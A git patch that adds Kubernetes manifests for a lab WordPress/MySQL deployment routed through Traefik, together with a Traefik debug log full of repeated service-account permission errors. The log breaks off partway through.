From 907676febe0b678877952fc0f1a7c311878d0255 Mon Sep 17 00:00:00 2001 From: Sangmin Kim Date: Mon, 1 Apr 2024 16:49:44 +0900 Subject: [PATCH] new file: akashop/deployment.yml --- akashop/deployment.yml | 108 + akashop/ingress.yml | 65 + akashop/nginx-ext.yml | 12 + akashop/pv.yml | 35 + akashop/pvc.yml | 29 + akashop/service.yml | 29 + akashop/temp.log | 3796 +++++++++++++++++++++++++++++++ traefik/00-account.yml | 4 + traefik/00-role.yml | 33 + traefik/01-role-binding.yml | 14 + traefik/02-traefik-services.yml | 30 + traefik/02-traefik.yml | 42 + 12 files changed, 4197 insertions(+) create mode 100644 akashop/deployment.yml create mode 100644 akashop/ingress.yml create mode 100644 akashop/nginx-ext.yml create mode 100644 akashop/pv.yml create mode 100644 akashop/pvc.yml create mode 100644 akashop/service.yml create mode 100644 akashop/temp.log create mode 100644 traefik/00-account.yml create mode 100644 traefik/00-role.yml create mode 100644 traefik/01-role-binding.yml create mode 100644 traefik/02-traefik-services.yml create mode 100644 traefik/02-traefik.yml diff --git a/akashop/deployment.yml b/akashop/deployment.yml new file mode 100644 index 0000000..7e9fdae --- /dev/null +++ b/akashop/deployment.yml @@ -0,0 +1,108 @@ +apiVersion: apps/v1 +kind: Deployment +metadata: + name: wp + namespace: akashop +spec: + replicas: 1 + selector: + matchLabels: + app: wp + template: + metadata: + labels: + app: wp + spec: + containers: + - name: wp + image: wordpress + imagePullPolicy: Always + resources: + limits: + cpu: "1" + memory: "1Gi" + requests: + cpu: "0.5" + memory: "200Mi" + ports: + - name: http + containerPort: 80 + env: + - name: WORDPRESS_DB_HOST + value: "db" + - name: WORDPRESS_DB_USER + value: "wordpress" + - name: WORDPRESS_DB_PASSWORD + value: "examplepass" + - name: WORDPRESS_DB_NAME + value: "wordpress" + # - name: secret + # valueFrom: # Specify value from a secret (more secure) + # secretKeyRef: + # name: my-secret # Name of the secret containing the variable + # key: VAR2_KEY + # livenessProbe: + # httpGet: + # path: / + # port: 80 + # initialDelaySeconds: 5 + # periodSeconds: 10 + volumeMounts: + - name: wp-data + mountPath: /var/www/html + volumes: + - name: wp-data + persistentVolumeClaim: + claimName: wp-data-pvc + +--- + +apiVersion: apps/v1 +kind: Deployment +metadata: + name: db + namespace: akashop +spec: + replicas: 1 + selector: + matchLabels: + app: db + template: + metadata: + labels: + app: db + spec: + containers: + - name: db + image: mysql + imagePullPolicy: Always + resources: + limits: + cpu: "1" + memory: "1Gi" + requests: + cpu: "0.5" + memory: "200Mi" + ports: + - containerPort: 3306 + env: + - name: MYSQL_DATABASE + value: "wordpress" + - name: MYSQL_USER + value: "wordpress" + - name: MYSQL_PASSWORD + value: "examplepass" + - name: MYSQL_RANDOM_ROOT_PASSWORD + value: "1" + # - name: secret + # valueFrom: # Specify value from a secret (more secure) + # secretKeyRef: + # name: my-secret # Name of the secret containing the variable + # key: VAR2_KEY + volumeMounts: + - name: db-data + mountPath: /var/lib/mysql + volumes: + - name: db-data + persistentVolumeClaim: + claimName: db-data-pvc diff --git a/akashop/ingress.yml b/akashop/ingress.yml new file mode 100644 index 0000000..9d61447 --- /dev/null +++ b/akashop/ingress.yml @@ -0,0 +1,65 @@ +apiVersion: networking.k8s.io/v1 +kind: Ingress +metadata: + name: wp-https + namespace: akashop + annotations: + traefik.ingress.kubernetes.io/router.entrypoints: websecure + traefik.ingress.kubernetes.io/router.tls: "true" + traefik.ingress.kubernetes.io/router.tls.certresolver: le +spec: + rules: + - host: whoami.172.233.168.9.nip.io + http: + paths: + - path: / + pathType: Prefix + backend: + service: + name: wp + port: + number: 80 + +--- + +apiVersion: networking.k8s.io/v1 +kind: Ingress +metadata: + name: wp-http + namespace: akashop + annotations: + traefik.ingress.kubernetes.io/router.entrypoints: web +spec: + rules: + - host: whoami.172.233.168.9.nip.io + http: + paths: + - path: / + pathType: Prefix + backend: + service: + name: wp + port: + number: 80 + +--- + +apiVersion: networking.k8s.io/v1 +kind: Ingress +metadata: + name: wp-origin + namespace: akashop + annotations: + traefik.ingress.kubernetes.io/router.entrypoints: web +spec: + rules: + - host: origin-akashop.akamai-lab.com + http: + paths: + - path: / + pathType: Prefix + backend: + service: + name: wp + port: + number: 80 diff --git a/akashop/nginx-ext.yml b/akashop/nginx-ext.yml new file mode 100644 index 0000000..424df54 --- /dev/null +++ b/akashop/nginx-ext.yml @@ -0,0 +1,12 @@ +apiVersion: v1 +kind: Service +metadata: + name: nginx + namespace: akashop +spec: + type: ExternalName + externalName: nginx.nginx.svc.cluster.local + ports: + - name: http + port: 80 + protocol: TCP \ No newline at end of file diff --git a/akashop/pv.yml b/akashop/pv.yml new file mode 100644 index 0000000..5783d4c --- /dev/null +++ b/akashop/pv.yml @@ -0,0 +1,35 @@ +apiVersion: v1 +kind: PersistentVolume +metadata: + name: wp-data + namespace: akashop +spec: + capacity: + storage: 1Gi + volumeMode: Filesystem + accessModes: + - ReadWriteMany + persistentVolumeReclaimPolicy: Recycle + storageClassName: "" + nfs: + path: /nfs/share/akashop/volumes/wp + server: 10.0.0.5 + +--- + +apiVersion: v1 +kind: PersistentVolume +metadata: + name: db-data + namespace: akashop +spec: + capacity: + storage: 1Gi + volumeMode: Filesystem + accessModes: + - ReadWriteMany + persistentVolumeReclaimPolicy: Recycle + storageClassName: "" + nfs: + path: /nfs/share/akashop/volumes/db + server: 10.0.0.5 diff --git a/akashop/pvc.yml b/akashop/pvc.yml new file mode 100644 index 0000000..9b5a3e6 --- /dev/null +++ b/akashop/pvc.yml @@ -0,0 +1,29 @@ +apiVersion: v1 +kind: PersistentVolumeClaim +metadata: + name: wp-data-pvc +spec: + accessModes: + - ReadWriteMany + volumeMode: Filesystem + storageClassName: "" + resources: + requests: + storage: 1Gi + volumeName: wp-data + +--- + +apiVersion: v1 +kind: PersistentVolumeClaim +metadata: + name: db-data-pvc +spec: + accessModes: + - ReadWriteMany + volumeMode: Filesystem + storageClassName: "" + resources: + requests: + storage: 1Gi + volumeName: db-data \ No newline at end of file diff --git a/akashop/service.yml b/akashop/service.yml new file mode 100644 index 0000000..dfdc81f --- /dev/null +++ b/akashop/service.yml @@ -0,0 +1,29 @@ +apiVersion: v1 +kind: Service +metadata: + name: wp + namespace: akashop +spec: + selector: + app: wp + ports: + - protocol: TCP + port: 80 + targetPort: http + type: ClusterIP + +--- + +apiVersion: v1 +kind: Service +metadata: + name: db + namespace: akashop +spec: + selector: + app: db + ports: + - protocol: TCP + port: 3306 + targetPort: 3306 + type: ClusterIP diff --git a/akashop/temp.log b/akashop/temp.log new file mode 100644 index 0000000..1b55d74 --- /dev/null +++ b/akashop/temp.log @@ -0,0 +1,3796 @@ +time="2024-03-30T06:16:23Z" level=info msg="Configuration loaded from flags." +time="2024-03-30T06:16:23Z" level=info msg="Traefik version 2.11.0 built on 2024-02-12T15:26:45Z" +time="2024-03-30T06:16:23Z" level=debug msg="Static configuration loaded {\"global\":{\"checkNewVersion\":true},\"serversTransport\":{\"maxIdleConnsPerHost\":200},\"entryPoints\":{\"traefik\":{\"address\":\":8080\",\"transport\":{\"lifeCycle\":{\"graceTimeOut\":\"10s\"},\"respondingTimeouts\":{\"idleTimeout\":\"3m0s\"}},\"forwardedHeaders\":{},\"http\":{},\"http2\":{\"maxConcurrentStreams\":250},\"udp\":{\"timeout\":\"3s\"}},\"web\":{\"address\":\":80\",\"transport\":{\"lifeCycle\":{\"graceTimeOut\":\"10s\"},\"respondingTimeouts\":{\"idleTimeout\":\"3m0s\"}},\"forwardedHeaders\":{},\"http\":{},\"http2\":{\"maxConcurrentStreams\":250},\"udp\":{\"timeout\":\"3s\"}},\"websecure\":{\"address\":\":443\",\"transport\":{\"lifeCycle\":{\"graceTimeOut\":\"10s\"},\"respondingTimeouts\":{\"idleTimeout\":\"3m0s\"}},\"forwardedHeaders\":{},\"http\":{},\"http2\":{\"maxConcurrentStreams\":250},\"udp\":{\"timeout\":\"3s\"}}},\"providers\":{\"providersThrottleDuration\":\"2s\",\"kubernetesIngress\":{\"allowExternalNameServices\":true}},\"api\":{\"insecure\":true,\"dashboard\":true},\"log\":{\"level\":\"DEBUG\",\"format\":\"common\"},\"accessLog\":{\"format\":\"common\",\"filters\":{},\"fields\":{\"defaultMode\":\"keep\",\"headers\":{\"defaultMode\":\"drop\"}}},\"certificatesResolvers\":{\"le\":{\"acme\":{\"email\":\"learn@akamai.com\",\"caServer\":\"https://acme-staging-v02.api.letsencrypt.org/directory\",\"storage\":\"acme.json\",\"keyType\":\"RSA4096\",\"certificatesDuration\":2160,\"tlsChallenge\":{}}}}}" +time="2024-03-30T06:16:23Z" level=info msg="\nStats collection is disabled.\nHelp us improve Traefik by turning this feature on :)\nMore details on: https://doc.traefik.io/traefik/contributing/data-collection/\n" +time="2024-03-30T06:16:23Z" level=info msg="Starting provider aggregator aggregator.ProviderAggregator" +time="2024-03-30T06:16:23Z" level=debug msg="Starting TCP Server" entryPointName=websecure +time="2024-03-30T06:16:23Z" level=debug msg="Starting TCP Server" entryPointName=web +time="2024-03-30T06:16:23Z" level=debug msg="Starting TCP Server" entryPointName=traefik +time="2024-03-30T06:16:23Z" level=info msg="Starting provider *ingress.Provider" +time="2024-03-30T06:16:23Z" level=debug msg="*ingress.Provider provider configuration: {\"allowExternalNameServices\":true}" +time="2024-03-30T06:16:23Z" level=info msg="Starting provider *acme.ChallengeTLSALPN" +time="2024-03-30T06:16:23Z" level=debug msg="*acme.ChallengeTLSALPN provider configuration: {}" +time="2024-03-30T06:16:23Z" level=info msg="Starting provider *acme.Provider" +time="2024-03-30T06:16:23Z" level=debug msg="*acme.Provider provider configuration: {\"email\":\"learn@akamai.com\",\"caServer\":\"https://acme-staging-v02.api.letsencrypt.org/directory\",\"storage\":\"acme.json\",\"keyType\":\"RSA4096\",\"certificatesDuration\":2160,\"tlsChallenge\":{},\"ResolverName\":\"le\",\"store\":{},\"TLSChallengeProvider\":{},\"HTTPChallengeProvider\":{}}" +time="2024-03-30T06:16:23Z" level=info msg="ingress label selector is: \"\"" providerName=kubernetes +time="2024-03-30T06:16:23Z" level=info msg="Creating in-cluster Provider client" providerName=kubernetes +time="2024-03-30T06:16:23Z" level=debug msg="Attempt to renew certificates \"720h0m0s\" before expiry and check every \"24h0m0s\"" providerName=le.acme ACME CA="https://acme-staging-v02.api.letsencrypt.org/directory" +time="2024-03-30T06:16:23Z" level=info msg="Testing certificate renew..." providerName=le.acme ACME CA="https://acme-staging-v02.api.letsencrypt.org/directory" +time="2024-03-30T06:16:23Z" level=debug msg="Configuration received: {\"http\":{},\"tcp\":{},\"udp\":{},\"tls\":{}}" providerName=le.acme +time="2024-03-30T06:16:23Z" level=warning msg="ExternalName service loading is enabled, please ensure that this is expected (see AllowExternalNameServices option)" providerName=kubernetes +time="2024-03-30T06:16:23Z" level=info msg="Starting provider *traefik.Provider" +time="2024-03-30T06:16:23Z" level=debug msg="*traefik.Provider provider configuration: {}" +time="2024-03-30T06:16:23Z" level=debug msg="Configuration received: {\"http\":{\"routers\":{\"api\":{\"entryPoints\":[\"traefik\"],\"service\":\"api@internal\",\"rule\":\"PathPrefix(`/api`)\",\"priority\":2147483646},\"dashboard\":{\"entryPoints\":[\"traefik\"],\"middlewares\":[\"dashboard_redirect@internal\",\"dashboard_stripprefix@internal\"],\"service\":\"dashboard@internal\",\"rule\":\"PathPrefix(`/`)\",\"priority\":2147483645}},\"services\":{\"api\":{},\"dashboard\":{},\"noop\":{}},\"middlewares\":{\"dashboard_redirect\":{\"redirectRegex\":{\"regex\":\"^(http:\\\\/\\\\/(\\\\[[\\\\w:.]+\\\\]|[\\\\w\\\\._-]+)(:\\\\d+)?)\\\\/$\",\"replacement\":\"${1}/dashboard/\",\"permanent\":true}},\"dashboard_stripprefix\":{\"stripPrefix\":{\"prefixes\":[\"/dashboard/\",\"/dashboard\"]}}},\"serversTransports\":{\"default\":{\"maxIdleConnsPerHost\":200}}},\"tcp\":{},\"udp\":{},\"tls\":{}}" providerName=internal +W0330 06:16:23.972045 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:16:23.972432 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:16:23.971945 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:16:23.972470 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:16:23.972090 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:16:23.972487 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:16:23.971984 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:16:23.972519 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +time="2024-03-30T06:16:24Z" level=debug msg="No default certificate, fallback to the internal generated certificate" tlsStoreName=default +time="2024-03-30T06:16:24Z" level=debug msg="Added outgoing tracing middleware api@internal" middlewareName=tracing middlewareType=TracingForwarder routerName=api@internal entryPointName=traefik +time="2024-03-30T06:16:24Z" level=debug msg="Added outgoing tracing middleware dashboard@internal" middlewareName=tracing entryPointName=traefik routerName=dashboard@internal middlewareType=TracingForwarder +time="2024-03-30T06:16:24Z" level=debug msg="Creating middleware" entryPointName=traefik routerName=dashboard@internal middlewareName=dashboard_stripprefix@internal middlewareType=StripPrefix +time="2024-03-30T06:16:24Z" level=debug msg="Adding tracing to middleware" entryPointName=traefik routerName=dashboard@internal middlewareName=dashboard_stripprefix@internal +time="2024-03-30T06:16:24Z" level=debug msg="Creating middleware" middlewareType=RedirectRegex entryPointName=traefik routerName=dashboard@internal middlewareName=dashboard_redirect@internal +time="2024-03-30T06:16:24Z" level=debug msg="Setting up redirection from ^(http:\\/\\/(\\[[\\w:.]+\\]|[\\w\\._-]+)(:\\d+)?)\\/$ to ${1}/dashboard/" middlewareName=dashboard_redirect@internal middlewareType=RedirectRegex entryPointName=traefik routerName=dashboard@internal +time="2024-03-30T06:16:24Z" level=debug msg="Adding tracing to middleware" middlewareName=dashboard_redirect@internal entryPointName=traefik routerName=dashboard@internal +time="2024-03-30T06:16:24Z" level=debug msg="Creating middleware" middlewareType=Recovery entryPointName=traefik middlewareName=traefik-internal-recovery +W0330 06:16:25.269212 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:16:25.269242 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:16:25.371610 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:16:25.371641 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:16:25.397721 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:16:25.397750 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:16:25.484475 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:16:25.484510 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:16:27.101232 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:16:27.101276 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:16:27.294304 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:16:27.294335 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:16:27.515287 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:16:27.515383 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:16:28.461503 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:16:28.461773 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:16:31.930531 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:16:31.930562 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:16:31.994993 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:16:31.995024 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:16:32.606911 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:16:32.606947 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:16:33.448507 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:16:33.448541 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:16:38.444899 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:16:38.444986 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:16:43.152074 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:16:43.152127 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:16:45.065048 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:16:45.065147 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:16:45.160583 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:16:45.160619 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:17:01.880640 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:17:01.880801 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:17:03.458930 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:17:03.458964 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:17:04.095637 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:17:04.095680 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:17:06.603619 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:17:06.603667 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:17:30.989597 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:17:30.989629 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:17:38.611186 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:17:38.611217 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:17:42.267202 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 06:17:42.267238 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +W0330 06:17:44.454349 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:17:44.454386 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:18:20.744390 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 06:18:20.744426 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 06:18:23.455181 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 06:18:23.455265 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +W0330 06:18:25.245796 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 06:18:25.245955 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 06:18:37.041699 1 